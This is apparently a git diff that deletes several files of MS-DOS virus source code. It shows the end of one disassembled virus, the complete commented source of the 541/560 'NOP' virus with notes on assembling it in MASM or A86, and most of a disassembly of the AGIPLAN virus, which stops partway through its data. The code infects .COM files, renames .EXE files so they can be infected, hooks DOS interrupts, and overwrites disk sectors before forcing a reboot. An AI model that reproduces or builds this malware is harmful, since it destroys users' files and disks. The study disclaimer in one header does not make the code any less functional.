8A45FC _E_ - AND AL,1Fh ;00276 241F $_ - CMP AL,1Fh ;00278 3C1F <_ - JZ H00284 ;0027A 7408 t_ - MOV AX,[DI+17h] ;0027C 8B4517 _E_ - SUB AX,4F43h ;0027F 2D434F -CO - JNZ H002C3 ;00282 753F u? -H00284: XOR [DI-04h],AL ;00284 3045FC 0E_ - MOV AX,[DI] ;00287 8B05 __ - CMP AX,CX ;00289 3BC1 ;_ -;--------------------------------------------------- - DB "r6" ;0028B 7236 -;--------------------------------------------------- - ADD AX,CX ;0028D 03C1 __ - JB H002C3 ;0028F 7232 r2 - TEST Byte Ptr [DI-0Dh],04h ;00291 F645F304 _E__ - JNZ H002C3 ;00295 752C u, - LDS SI,[DI-0Ah] ;00297 C575F6 _u_ - DEC AX ;0029A 48 H - SHR AH,1 ;0029B D0EC __ - AND AH,[SI+04h] ;0029D 226404 "d_ - JZ H002C3 ;002A0 7421 t! - MOV AX,0020h ;002A2 B82000 _ _ - MOV DS,AX ;DS_Chg ;002A5 8ED8 __ - SUB DX,DX ;002A7 2BD2 +_ - CALL H00211 ; . . . . . . . . . ;002A9 E865FF _e_ - MOV SI,DX ;002AC 8BF2 __ - PUSH CX ;002AE 51 Q - LODSB ;002AF AC _ - CMP AL,CS:[SI+07h] ;CS_Ovrd ;002B0 2E3A4407 .:D_ - JNZ H002DD ;002B4 7527 u' - LOOP H002AF ;002B6 E2F7 __ - POP CX ;002B8 59 Y - OR Byte Ptr ES:[DI-04h],1Fh - ;ES_Ovrd ;002B9 26804DFC1F &_M__ - OR Byte Ptr ES:[DI-0Bh],40h - ;ES_Ovrd ;002BE 26804DF540 &_M_@ -H002C3: MOV AH,3Eh ;002C3 B43E _> - CALL H00213 ; . . . . . . . . . ;002C5 E84BFF _K_ - OR Byte Ptr ES:[DI-0Ch],40h - ;ES_Ovrd ;002C8 26804DF440 &_M_@ - POP DS ;002CD 1F _ - POP DX ;002CE 5A Z - MOV AX,2524h ;002CF B82425 _$% - INT 21h ;1-Set_Int_Vctr ;002D2 CD21 _! - POP DS ;002D4 1F _ - POP DX ;002D5 5A Z - MOV AL,13h ;002D6 B013 __ - INT 21h ;Indef_INT:21h-25h ;002D8 CD21 _! - JMP H00232 ;002DA E955FF _U_ -;--------------------------------------------------- -H002DD: POP CX ;002DD 59 Y - MOV SI,ES:[DI] ;ES_Ovrd ;002DE 268B35 &_5 - MOV ES:[DI+04h],SI ;ES_Ovrd ;002E1 26897504 &_u_ - MOV AH,40h ;002E5 B440 _@ - INT 21h ;2-Wr_Fl_Hdl ;002E7 CD21 _! - JB H002BE ;002E9 72D3 r_ - MOV ES:[DI],SI ;ES_Ovrd ;002EB 268935 &_5 - MOV ES:[DI+04h],DX ;ES_Ovrd ;002EE 26895504 &_U_ - PUSH CS ;002F2 0E _ - POP DS ;002F3 1F _ - MOV DL,08h ;002F4 B208 __ - MOV AH,40h ;002F6 B440 _@ - INT 21h ;2-Wr_Fl_Hdl ;002F8 CD21 _! - JMP Short H002B9 ;002FA EBBD __ -;--------------------------------------------------- - IRET ;002FC CF _ -;--------------------------------------------------- - DB "666" ;002FD 363636 -;--------------------------------------------------- - - -P00100 ENDP - -CODE ENDS - END H00100 - -;------------------------------------------------------------------------------- - -INT 2F - Multiplex - DOS 3.3+ - SET DISK INTERRUPT HANDLER - AH = 13h - DS:DX -> interrupt handler disk driver calls on read/write - ES:BX = address to restore INT 13 to on system halt (exit from root - shell) -Return: DS:DX from previous invocation of this function - ES:BX from previous invocation of this function -Notes: most DOS 3.3+ disk access is via the vector in DS:DX, although a few - functions are still invoked via an INT 13 instruction - this is a dangerous security loophole for any virus-monitoring software - which does not trap this call (at least two viruses are known to use - it to get the original ROM entry point) diff --git a/0-9/560 (12).ASM b/0-9/560 (12).ASM deleted file mode 100755 index 988d520..0000000 --- a/0-9/560 (12).ASM +++ /dev/null @@ -1,464 +0,0 @@ -;****************************************************************************; -; ; -; -=][][][][][][][][][][][][][][][=- ; -; -=] P E R F E C T C R I M E [=- ; -; -=] +31.(o)79.426o79 [=- ; -; -=] [=- ; -; -=] For All Your H/P/A/V Files [=- ; -; -=] SysOp: Peter Venkman [=- ; -; -=] [=- ; -; -=] +31.(o)79.426o79 [=- ; -; -=] P E R F E C T C R I M E [=- ; -; -=][][][][][][][][][][][][][][][=- ; -; ; -; *** NOT FOR GENERAL DISTRIBUTION *** ; -; ; -; This File is for the Purpose of Virus Study Only! It Should not be Passed ; -; Around Among the General Public. It Will be Very Useful for Learning how ; -; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; -; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; -; Experience can Turn it Into a far More Malevolent Program Than it Already ; -; Is. Keep This Code in Responsible Hands! ; -; ; -;****************************************************************************; - -PAGE 70,120 - -;; -;; -;; Name Virus: 541-Virus 14 Sept 1990 -;; Suggested Alias: NOP-Virus -;; Variant: 537-Virus, 560-Virus -;; -;; Last Reported: September 1990 -;; 'Isolated': The Hague, The Netherlands -;; by: Righard Zwienenberg 2:512/2.3@fidonet -;; -;; Author: Ralf Burger in 1986 for his book: -;; VIRUSES, A HIGH TECHNICAL DISEASE -;; -;; -;; The code of this virus was built into a MOVE-util. It was imple- -;; mented wrong. The virus went straight to the destruction code. -;; I've taken the code out and reconstructed it to its original -;; form. Because I had a listing of Ralf Burger's book I have placed -;; his own comments behind the code, although I've translated it into -;; English. The labels used, are also his. -;; -;; I've put three comments myself in the code. These can be recog- -;; nized by the starting ;; of it. -;; -;; Edwin Cleton, the one who send me the MOVE util for examination -;; downloaded it from a BBS. So far there are no damage reports. -;; The move-util checked the system's date. If the date is 1 Aug -;; or later of any year, the virus was called. -;; -;; -;; -;; This sourcelisting can be recompiled with MASM 4.0+ and A86. For -;; compilation with A86 you must specify 'conta' and 'disks' as a word -;; else the definition will conflict with what A86 previously thinks. -;; -;; -;; -;; Virus-Description: -;; ------------------ -;; -;; The virus infects the first COM-file in the ROOT-Directory. The -;; virus overwrites the first 230h bytes of the file. When an infected -;; file is executed it will infect one other .COM-file. The system will -;; crash mostly afterwards because the overwritten part is not stored. -;; When COMMAND.COM is infected on the HDU, the system will not reboot -;; because COMMAND.COM is complete. Each reboot COMMAND.COM will infect -;; one other .COM-File and the computer crashes. When all .COM-files -;; are infected, .EXE-files will be renamed (FCB) to .COM to become -;; infected. When all .COM and .EXE-files are infected, the virus will -;; write to sectors on disk depending on the system's time. -;; The infected files are lost en must be replaced by backup-copies. -;; -;; The shortest size an infected file can be is 230h bytes. The code is -;; shorter, but this is the value which has been put into the code as -;; the virus-length. -;; -;; - - -Code Segment - Assume CS:Code -progr equ 100h - org progr - -; -; The three NOP's are set as a identifier for the virus. This way -; the virus knows this copy is already infected. -; - -MAIN: - nop - nop - nop - -; -; Init the Pointers -; - - mov ax,0 - mov es:[pointer],ax - mov es:[counter],ax - mov es:[disks],al - -; -; Get actual diskdrive -; - - mov ah,19h ; drive? - int 21h - -; -; Get actual path -; - - mov cs:drive,al ; save drive - mov ah,47h ; dir? - mov dh,0 - add al,1 - mov dl,al ; in actual drive? - lea si,cs:old_path - int 21h - -; -; Get actual number of present diskdrives.If only one diskdrive is present, -; the pointer for 'search_order' will transfered to 'search_order + 6' -; - - mov ah,0Eh ; how many disks - mov dl,0 - int 21h - mov al,1 - cmp al,1 ; one drive? - jne hups3 - mov al,6 -hups3: - mov ah,0 - lea bx,cs:search_order - add bx,ax - add bx,1 - mov cs:pointer,bx - clc - -; -; The carry-flag is set if the search will find no more .COM-files. To do -; it the easy way, all .EXE-files will get the .COM-extention to become -; infected. This will result in an error if the executed .EXE is to big. -; The error-message 'Program too big to fit in memory' will be the result. -; - -change_disk: - jnc no_name_change - mov ah,17h ; change exe to com - lea dx,cs:mask_exe - int 21h - cmp al,0FFh - jnz no_name_change ; .EXE found? - -; -; When no .COM or .EXE-files are found, sectors will be overwritten, -; depending from the system's time in the msec-range. This is the moment -; that the entire disk is infected. 'VIRUS' can not infect any more and -; starts the destruction. -; - - mov ah,2Ch ; read system clock - int 21h - mov bx,cs:pointer - mov al,cs:[bx] - mov bx,dx - mov cx,2 - mov dh,0 - int 26h ; Write shit on disk - -; -; Test if the end of the seek-procedure or of the table has been reached. -; If so: end. -; - -no_name_change: - mov bx,cs:pointer - dec bx - mov cs:pointer,bx - mov dl,cs:[bx] - cmp dl,0FFh - jnz hups2 - jmp hops - -; -; Get new disk from the list with search orders and make it the actual one. -; - -hups2: - mov ah,0Eh - int 21h ; change disk - -; -; Start at the ROOT-Directory. -; - - mov ah,3Bh ; change path - lea dx,cs:path - int 21h - jmp find_first_file - -; -; Starting from the ROOT-dir, search for the first sub-dir. Previous change -; all .EXE-files into .COM-files in the old directory. -; - -find_first_subdir: - mov ah,17h ; change exe to com - lea dx,cs:mask_exe - int 21h - mov ah,3Bh ; use root dir - lea dx,cs:path - int 21h - mov ah,4Eh ; search for first subdir - mov cx,11h ; dir mask - lea dx,cs:mask_dir - int 21h - jc change_disk - mov bx,cs:counter - inc bx - dec bx - jz use_next_subdir - -; -; Search for the next sub-dirs. Change to other drive if no sub-dir is -; found. -; - -find_next_subdir: - mov ah,4Fh ; search for next sub-dir. - int 21h - jc change_disk - dec bx - jnz find_next_subdir - -; -; Change found sub-dir in actual one. -; - -use_next_subdir: - mov ah,2Fh ; get dta address - int 21h - add bx,1Ch - mov word ptr es:[bx],'\' ; address of name in dta - inc bx - push ds - mov ax,es - mov ds,ax - mov dx,bx - mov ah,3Bh ; change path - int 21h - pop ds - mov bx,cs:counter - inc bx - mov cs:counter,bx - -; -; Search first .COM-file in the actual directory. If no .COM-files present, -; search the next directory. -; - -find_first_file: - mov ah,4Eh ; search for first - mov cx,1 ; mask - lea dx,cs:mask_com - int 21h - jc find_first_subdir - jmp short check_if_ill - -; -; If the file is already infected, search next file. -; - -find_next_file: - mov ah,4Fh ; search for next - int 21h - jc find_first_subdir - -; -; Test on infection. -; - -check_if_ill: - mov ah,3Dh ; open channel - mov al,2 ; read/write - mov dx,9Eh ; address of name in dta - int 21h - mov bx,ax ; save channel - mov ah,3Fh ; read file - mov cx,buflen - mov dx,buffer ; write in buffer - int 21h - mov ah,3Eh ; close file - int 21h - -; -; Test if the three NOPs of 'VIRUS' are present. If so, the file is already -; infected, continue searching. -; - - mov bx,cs:[buffer] - cmp bx,9090h - jz find_next_file - -; -; Erase the write-protection attribute from MS-DOS. -; - - mov ah,43h ; write enable - mov al,0 - mov dx,9Eh ; address of name in dta - int 21h - mov ah,43h - mov al,1 - and cx,0FEh - int 21h - -; -; Open file for writing/reading. -; - - mov ah,3Dh ; open channel - mov al,2 ; read/write - mov dx,9Eh ; address of name in dta - int 21h - -; -; Store date of file for later use. -; - - mov bx,ax ; channel - mov ah,57h ; get date - mov al,0 - int 21h - push cx ; save data - push dx - -; -; Save the original jump from program. -; - - mov dx,cs:[conta] ; save old jmp - mov cs:[jmpbuf],dx - mov dx,cs:[buffer+1] ; save new jump - lea cx,cs:cont-100h - sub dx,cx - mov cs:[conta],dx - -; -; 'VIRUS' copies itself to the beginning of a file. -; - - mov ah,40h ; write virus - mov cx,buflen ; length buffer - lea dx,main ; write virus - int 21h - -; -; Restore the old file-date. -; - - mov ah,57h ; write date - mov al,1 - pop dx - pop cx ; restore date - int 21h - -; -; Close file. -; - - mov ah,3Eh ; close file - int 21h - -; -; Restore the old jump-address. 'VIRUS' stores at address 'conta' the jump -; which was at the beginning of the host-program. This will keep the host- -; program as much executable as possible. After storing the address, it -; works with the jumpaddress of 'VIRUS'. 'VIRUS' will thus be in the -; work-memory of the program. -; - - mov dx,cs:[jmpbuf] ; restore old jmp - mov cs:[conta],dx -hops: - nop - call use_old - -; -; Continue the execution of the host-program. -; - - -cont db 0e9h -conta dw 0 - mov ah,00 - int 21h - -; -; Activate the diskdrive choosen at the entry of the program. -; - -use_old: - mov ah,0eh ; use old drive - mov dl,cs:drive - int 21h - -; -; Activate the path choosen at the entry of the program. -; - - mov ah,3Bh ; use old dir - lea dx,cs:[1FDh] ; get old path and - ; backslash - int 21h - ret - - -search_order db 0FFh,1,0,2,3,0FFh,0,0FFh -pointer dw 0000 -counter dw 0000 -disks db 0 -mask_com db "*.com",00 ; search for com-files -mask_dir db "*",00 ; search for dirs -mask_exe db 0FFh, 0, 0, 0, 0, 0, 3Fh - db 0,"????????exe",0,0,0,0 - db 0,"????????com",0 -mask_all db 0FFh, 0, 0, 0, 0, 0, 3Fh - db 0,"???????????",0,0,0,0 - db 0,"????????com",0 - -;; mask_all is never used by the code and easilly can be ommited -;; to shorten the code - -buffer equ 0e000h ; a save place -buflen equ 230h ; length of virus - -;; At this place I disagree with Ralf. The actual length of the virus -;; is 21Dh bytes when compiled in MASM and 219h bytes when compiled -;; in A86. Because it was Ralf's intention to compile this in MASM -;; 21Dh should be the original length. - -jmpbuf equ buffer+buflen ; a save place for jmp -path db "\",0 ; first path -drive db 0 ; actual drive -back_slash db "\" - -;; This variable is never used in the code and easilly can be ommited -;; to shorten the code. - -old_path db 32 dup (?) ; old path - -code ends - - end main diff --git a/a/AGIPLAN (15).ASM b/a/AGIPLAN (15).ASM deleted file mode 100755 index d1f62b0..0000000 --- a/a/AGIPLAN (15).ASM +++ /dev/null @@ -1,1003 +0,0 @@ - -PAGE 59,132 - -; -; -; AGIPLAN -; -; Created: 1-Sep-90 -; Version: -; Passes: 5 Analysis Options on: none -; -; -; - -movseg macro reg16, unused, Imm16 ; Fixup for Assembler - ifidn , - db 0BBh - endif - ifidn , - db 0B9h - endif - ifidn , - db 0BAh - endif - ifidn , - db 0BEh - endif - ifidn , - db 0BFh - endif - ifidn , - db 0BDh - endif - ifidn , - db 0BCh - endif - ifidn , - db 0BBH - endif - ifidn , - db 0B9H - endif - ifidn , - db 0BAH - endif - ifidn , - db 0BEH - endif - ifidn , - db 0BFH - endif - ifidn , - db 0BDH - endif - ifidn , - db 0BCH - endif - dw seg Imm16 -endm -data_1e equ 46Dh ; (0000:046D=0B35h) -data_2e equ 600h ; (0000:0600=54h) -data_3e equ 0Eh ; (0A10:000E=1) -data_4e equ 1 ; (936D:0001=0FFFFh) -data_5e equ 0 ; (936E:0000=0) -data_6e equ 2 ; (936E:0002=0) -data_7e equ 12h ; (936E:0012=0) -data_8e equ 14h ; (936E:0014=936Eh) -data_9e equ 0F0h ; (936E:00F0=0) -data_10e equ 0F6h ; (936E:00F6=0) -data_11e equ 0FAh ; (936E:00FA=0) -data_12e equ 0FEh ; (936E:00FE=0) -data_45e equ 2Ch ; (93CE:002C=0FFFFh) -data_46e equ 5B0h ; (93CE:05B0=41h) -data_47e equ 600h ; (93CE:0600=41h) -data_48e equ 1 ; (FFFE:0001=0) - -seg_a segment byte public - assume cs:seg_a, ds:seg_a - - - org 100h - -agiplan proc far - -start: - jmp loc_43 ; (04CF) -data_14 db 'P1.8&', 5, 'u', 7, 'X.', 0FFh - db '.', 5, '', 0FFh, 0 - db 75h,0F4h, 58h -data_15 db 9Dh - db 0B8h, 03h, 00h,0CFh, 90h, 90h - db 90h -data_16 db 0 - db 90h, 00h,0FFh,0FFh,0FFh,0FFh - db 0FFh - -agiplan endp - -; -; -; External Entry Point -; -; - -int_21h_entry proc far - pushf ; Push flags - cmp ah,4Eh ; 'N' - jne loc_4 ; Jump if not equal - jmp short loc_8 ; (0154) -loc_4: - cmp ah,4Bh ; 'K' - jne loc_5 ; Jump if not equal - jmp short loc_8 ; (0154) -loc_5: - cmp ah,0Eh - jne loc_6 ; Jump if not equal - jmp short loc_8 ; (0154) -loc_6: - cmp ah,40h ; '@' - jne loc_7 ; Jump if not equal - jmp short loc_8 ; (0154) -loc_7: - popf ; Pop flags - jmp dword ptr cs:data_35 ; (936E:05E4=138Dh) - db 90h -loc_8: - cli ; Disable interrupts - push es - push ds - push di - push si - push bp - push dx - push cx - push bx - push ax - mov cs:data_31,ss ; (936E:05DB=0A10h) - mov cs:data_32,sp ; (936E:05DD=743h) - mov al,0FFh - mov cs:data_30,al ; (936E:05DA=0FFh) - mov ax,3524h - int 7Eh ; ??INT Non-standard interrupt. - cmp word ptr cs:data_37,bx ; (936E:05E8=4EBh) - jne loc_9 ; Jump if not equal - mov ax,2524h - mov dx,108h - push cs - pop ds - int 7Eh ; ??INT Non-standard interrupt. -loc_9: - sti ; Enable interrupts - jmp short loc_11 ; (01AA) -loc_10: - cli ; Disable interrupts - xor ax,ax ; Zero register - mov cs:data_30,ah ; (936E:05DA=0FFh) - mov ss,cs:data_31 ; (936E:05DB=0A10h) - mov sp,cs:data_32 ; (936E:05DD=743h) - pop ax - pop bx - pop cx - pop dx - pop bp - pop si - pop di - pop ds - pop es - popf ; Pop flags - sti ; Enable interrupts - jmp dword ptr cs:data_35 ; (936E:05E4=138Dh) - db 90h -loc_11: - pop ax - pop bx - push bx - push ax - cmp ah,4Bh ; 'K' - je loc_16 ; Jump if equal - cmp ah,40h ; '@' - jne loc_12 ; Jump if not equal - jmp short loc_15 ; (01CC) -loc_12: - cmp ah,0Eh - jne loc_13 ; Jump if not equal - jmp short loc_10 ; (0187) -loc_13: - cmp ah,4Eh ; 'N' - jne loc_10 ; Jump if not equal - jmp short loc_10 ; (0187) - db 90h -loc_14: - jmp loc_23 ; (0283) -loc_15: - mov ax,0Fh - cmp cs:data_29,al ; (936E:05D9=0) - jb loc_10 ; Jump if below - ja loc_14 ; Jump if above - cmp bx,4 - jbe loc_10 ; Jump if below or = - mov bx,1 - push cs - pop ds - add ds:data_11e,bx ; (936E:00FA=0) - mov ah,2Ch ; ',' - int 7Eh ; ??INT Non-standard interrupt. - cmp dh,ds:data_11e ; (936E:00FA=0) - ja loc_10 ; Jump if above - mov bx,data_3e ; (0A10:000E=1) - add bx,data_32 ; (936E:05DD=743h) - mov ss:[bx],bx - jmp short loc_10 ; (0187) - db 01h, 90h, 90h, 90h -loc_16: - mov cs:data_33,dx ; (936E:05DF=3D7Bh) - mov cs:data_34,ds ; (936E:05E1=7B6Eh) - push cs - pop ds - mov ah,2Ch ; ',' - int 7Eh ; ??INT Non-standard interrupt. - cmp dh,ds:data_12e ; (936E:00FE=0) - jb loc_17 ; Jump if below - jmp loc_10 ; (0187) -loc_17: - mov dx,data_33 ; (936E:05DF=3D7Bh) - mov ds,data_34 ; (936E:05E1=7B6Eh) - push ax - mov al,2Eh ; '.' - cld ; Clear direction - push ds - push dx - cli ; Disable interrupts - mov di,dx - push ds - pop es - mov cx,20h - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - jnz loc_20 ; Jump if not zero - push cs - pop ds - mov si,offset data_21 ; (936E:05C8=43h) - mov cx,3 - repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] - jnz loc_22 ; Jump if not zero - sub di,0Bh - mov si,offset data_20 ; (936E:05C0=43h) - mov cx,0Bh - repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] - mov dh,0FFh - mov cs:data_16,dh ; (936E:0128=0) - jz loc_18 ; Jump if zero - xor dx,dx ; Zero register - mov cs:data_16,dh ; (936E:0128=0) -loc_18: - add sp,6 - push cs - pop ds -loc_19: - call sub_2 ; (02C0) -loc_20: - jmp loc_10 ; (0187) - db 90h, 90h -loc_21: -;* jmp loc_34 ;*(03E0) - db 0E9h, 76h, 01h -loc_22: - add sp,6 - push cs - pop ds - mov dx,5C0h - mov data_33,dx ; (936E:05DF=3D7Bh) - mov data_34,ds ; (936E:05E1=7B6Eh) - mov dh,0FFh - mov data_16,dh ; (936E:0128=0) - jmp short loc_19 ; (025F) - db 90h -loc_23: - mov cx,501h - mov dx,100h - call sub_1 ; (02A0) - mov dx,101h - call sub_1 ; (02A0) - mov dx,380h - call sub_1 ; (02A0) - mov dx,381h - call sub_1 ; (02A0) - int 19h ; Bootstrap loader -int_21h_entry endp - - -; -; SUBROUTINE -; - -sub_1 proc near - push dx -loc_24: - mov ax,309h - int 13h ; Disk dl=drive a ah=func 03h - ; write sectors from mem es:bx - sub dh,1 - cmp dh,0 - jge loc_24 ; Jump if > or = - pop dx - push dx - sub cx,100h - cmp cx,0 - jge loc_24 ; Jump if > or = - retn -sub_1 endp - - db 90h, 90h, 90h -loc_25: - jmp loc_31 ; (03A3) - -; -; SUBROUTINE -; - -sub_2 proc near - mov ah,48h ; 'H' - mov bx,0FFFh - int 7Eh ; ??INT Non-standard interrupt. - jc loc_21 ; Jump if carry Set - nop - mov ds:data_11e,ax ; (936E:00FA=0) - mov dx,data_33 ; (936E:05DF=3D7Bh) - mov ds,data_34 ; (936E:05E1=7B6Eh) - mov ah,3Ah ; ':' - mov bx,dx - add bx,1 - cmp ah,[bx] - mov ah,0 - jnz loc_27 ; Jump if not zero - mov bx,dx - mov al,50h ; 'P' - mov ah,[bx] - cmp ah,50h ; 'P' - ja loc_26 ; Jump if above - sub ah,40h ; '@' - jmp short loc_27 ; (02F5) -loc_26: - sub ah,60h ; '`' -loc_27: - mov dl,ah - mov ah,36h ; '6' - int 7Eh ; ??INT Non-standard interrupt. - cmp bx,9 - jb loc_25 ; Jump if below - mov dx,cs:data_33 ; (936E:05DF=3D7Bh) - mov ax,4300h - int 7Eh ; ??INT Non-standard interrupt. - mov cs:data_39,cx ; (936E:05EC=20h) - mov ax,4301h - xor cx,cx ; Zero register - int 7Eh ; ??INT Non-standard interrupt. - nop - mov ax,3D42h - int 7Eh ; ??INT Non-standard interrupt. - jc loc_25 ; Jump if carry Set - mov bx,ax - mov ah,3Fh ; '?' - mov cx,0FFFFh - mov dx,600h - mov ds,cs:data_11e ; (936E:00FA=0) - int 7Eh ; ??INT Non-standard interrupt. - jc loc_30 ; Jump if carry Set - add ax,600h - mov cs:data_10e,ax ; (936E:00F6=0) - cmp ax,1000h - jb loc_30 ; Jump if below - cmp ax,0D000h - ja loc_30 ; Jump if above - mov si,offset ds:[100h] ; (936E:0100=0E9h) - push cs - pop ds - xor di,di ; Zero register - mov es,cs:data_11e ; (936E:00FA=0) - mov cx,2FFh - cld ; Clear direction - rep movsw ; Rep when cx >0 Mov [si] to es:[di] - push es - pop ds - xor di,di ; Zero register - mov si,data_2e ; (0000:0600=54h) - mov cx,10h - repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] - jz loc_30 ; Jump if zero - mov ah,cs:data_16 ; (936E:0128=0) - cmp ah,0FFh - jne loc_28 ; Jump if not equal - call sub_3 ; (03C8) - jmp short loc_29 ; (0377) -loc_28: - mov ax,9090h - mov ds:data_1e,ax ; (0000:046D=0B35h) -loc_29: - nop - mov ax,4200h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 7Eh ; ??INT Non-standard interrupt. - mov ax,5700h - int 7Eh ; ??INT Non-standard interrupt. - push cx - push dx - mov ah,40h ; '@' - mov cx,cs:data_10e ; (936E:00F6=0) - xor dx,dx ; Zero register - mov ds,cs:data_11e ; (936E:00FA=0) - int 7Eh ; ??INT Non-standard interrupt. - pop dx - pop cx - mov ax,5701h - int 7Eh ; ??INT Non-standard interrupt. -loc_30: - mov ah,3Eh ; '>' - int 7Eh ; ??INT Non-standard interrupt. -loc_31: - mov cx,cs:data_39 ; (936E:05EC=20h) - mov dx,cs:data_33 ; (936E:05DF=3D7Bh) - mov ds,cs:data_34 ; (936E:05E1=7B6Eh) - mov ax,4301h -loc_32: - int 7Eh ; ??INT Non-standard interrupt. - push cs - pop ds - mov es,cs:data_11e ; (936E:00FA=0) - mov ah,49h ; 'I' - int 7Eh ; ??INT Non-standard interrupt. - retn -sub_2 endp - - db 90h, 90h, 90h, 90h, 90h - -; -; SUBROUTINE -; - -sub_3 proc near - mov ax,0D08Eh - mov ds:data_1e,ax ; (0000:046D=0B35h) - mov di,data_2e ; (0000:0600=54h) - mov cx,3000h - mov ax,0B8C9h -loc_33: - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - cmp ah,es:[di] - jne loc_33 ; Jump if not equal - mov dx,4200h - cmp dx,es:[di+1] - jne loc_33 ; Jump if not equal - mov dh,0BAh - cmp dh,es:[di-5] - jne loc_33 ; Jump if not equal - cmp cx,0 - jne loc_35 ; Jump if not equal - pop dx - jmp short loc_32 ; (03B5) - db 90h -loc_35: - mov dx,es:[di-4] - add dx,600h - mov es:[di-4],dx - retn -sub_3 endp - - db 11 dup (90h) - -; -; SUBROUTINE -; - -sub_4 proc near - mov ax,4A00h - mov bx,5Fh - int 21h ; DOS Services ah=function 4Ah - ; change mem allocation, bx=siz - mov bx,cs - sub bx,1 - mov ds,bx - mov ax,0FFFFh - mov ds:data_4e,ax ; (936D:0001=0FFFFh) - push cs - pop ds - mov ax,4800h - mov bx,0FFFFh - int 21h ; DOS Services ah=function 48h - ; allocate memory, bx=bytes/16 - mov ax,4800h - int 21h ; DOS Services ah=function 48h - ; allocate memory, bx=bytes/16 - retn -sub_4 endp - - db 0CBh - db 26 dup (90h) - -; -; SUBROUTINE -; - -sub_5 proc near - mov cx,10h - mov si,offset data_15 ; (936E:0120=9Dh) - mov di,data_9e ; (936E:00F0=0) - cld ; Clear direction - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - mov ah,2Ah ; '*' - int 21h ; DOS Services ah=function 2Ah - ; get date, cx=year, dx=mon/day - cmp cx,data_25 ; (936E:05D1=7BCh) - ja loc_38 ; Jump if above - jc loc_36 ; Jump if carry Set - cmp dx,data_26 ; (936E:05D3=701h) - ja loc_38 ; Jump if above -loc_36: - cmp cx,data_27 ; (936E:05D5=7BCh) - ja loc_39 ; Jump if above - jc loc_37 ; Jump if carry Set - cmp dx,data_28 ; (936E:05D7=501h) - ja loc_39 ; Jump if above -loc_37: - mov ax,0 - jmp short loc_40 ; (0487) -loc_38: - or ax,0F0h -loc_39: - or ax,0Fh -loc_40: - mov data_29,al ; (936E:05D9=0) - push dx - push cx - xor bx,bx ; Zero register - call sub_6 ; (04A5) - pop cx - pop dx - mov bx,data_6e ; (936E:0002=0) - call sub_6 ; (04A5) - mov ah,1 - add data_22,ah ; (936E:05CC=14h) - nop - retn -sub_5 endp - - db 90h, 90h, 90h, 90h - -; -; SUBROUTINE -; - -sub_6 proc near - add dl,data_24[bx] ; (936E:05CE=0) - cmp dl,20h ; ' ' - jbe loc_41 ; Jump if below or = - add dh,1 - sub dl,20h ; ' ' -loc_41: - add dh,data_23[bx] ; (936E:05CD=6) - cmp dh,0Bh - jbe loc_42 ; Jump if below or = - sub dh,0Bh - add cx,1 -loc_42: - add bx,bx - nop - mov data_26[bx],dx ; (936E:05D3=701h) - mov data_25[bx],cx ; (936E:05D1=7BCh) - retn -sub_6 endp - -loc_43: - push ax - mov al,3Fh ; '?' - mov dx,70h - out dx,al ; port 70h, RTC addr/enabl NMI - mov dx,71h - in al,dx ; port 71h, RTC clock/RAM data - cmp al,0F0h - jbe loc_44 ; Jump if below or = - jmp loc_47 ; (057B) -loc_44: - mov ax,357Fh - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov ax,ds - mov es,ax - cmp bx,0FFFFh - jne loc_45 ; Jump if not equal - jmp loc_48 ; (0582) -loc_45: - mov dx,0FFFFh - mov ax,257Fh - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov ax,3521h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov word ptr data_35,bx ; (936E:05E4=138Dh) - mov word ptr data_35+2,es ; (936E:05E6=28Ch) - mov ax,es - mov ds,ax - mov dx,bx - mov ax,257Eh - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov ax,cs - mov es,ax - mov ds,ax - mov dx,offset int_21h_entry - mov ax,2521h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov ax,3524h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov word ptr data_37,bx ; (936E:05E8=4EBh) - mov word ptr data_37+2,es ; (936E:05EA=0A10h) - mov ax,es - mov ds,ax - mov dx,bx - mov ax,25FDh - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov ax,cs - mov es,ax - mov ds,ax - mov dx,offset int_24h_entry - mov ax,2524h - mov ds:data_7e,dx ; (936E:0012=0) - mov ds:data_8e,ds ; (936E:0014=936Eh) - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - call sub_5 ; (0450) - call sub_4 ; (0410) - nop - nop - nop - nop - nop -loc_46: - mov cx,80h - mov di,data_47e ; (93CE:0600=41h) - mov si,data_5e ; (936E:0000=0) - cld ; Clear direction - rep movsw ; Rep when cx >0 Mov [si] to es:[di] - mov ax,ds - add ax,60h - mov word ptr ds:[579h],ax ; (936E:0579=0E64h) - nop - nop - mov es,ax - mov ds,ax - pop ax - nop - nop -;* jmp far ptr loc_1 ;*(0E64:0100) - db 0EAh, 00h, 01h, 64h, 0Eh -loc_47: - mov dx,data_46e ; (93CE:05B0=41h) - mov ah,9 - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx -loc_48: - mov ax,4A00h - mov bx,5Fh - int 21h ; DOS Services ah=function 4Ah - ; change mem allocation, bx=siz - mov bx,ds:data_45e ; (93CE:002C=0FFFFh) - sub bx,1 - xor ax,ax ; Zero register - mov ds,bx - mov ds:data_48e,ax ; (FFFE:0001=0) - mov bx,cs - add bx,60h - mov dx,cs - sub dx,1 - mov ds,dx - mov ds:data_4e,bx ; (936D:0001=0FFFFh) - mov ah,50h ; 'P' - int 21h ; DOS Services ah=function 50h - ; set active PSP segmnt from bx - push cs - pop ds - jmp short loc_46 ; (0559) - db 'load error', 0Dh, 0Ah, '$' - db 0Ah, '$' - db 0 -data_20 db 'COMMAND.' -data_21 db 43h - db 4Fh, 4Dh, 00h -data_22 db 14h -data_23 db 6 ; Data table (indexed access) -data_24 db 0 ; Data table (indexed access) - db 4, 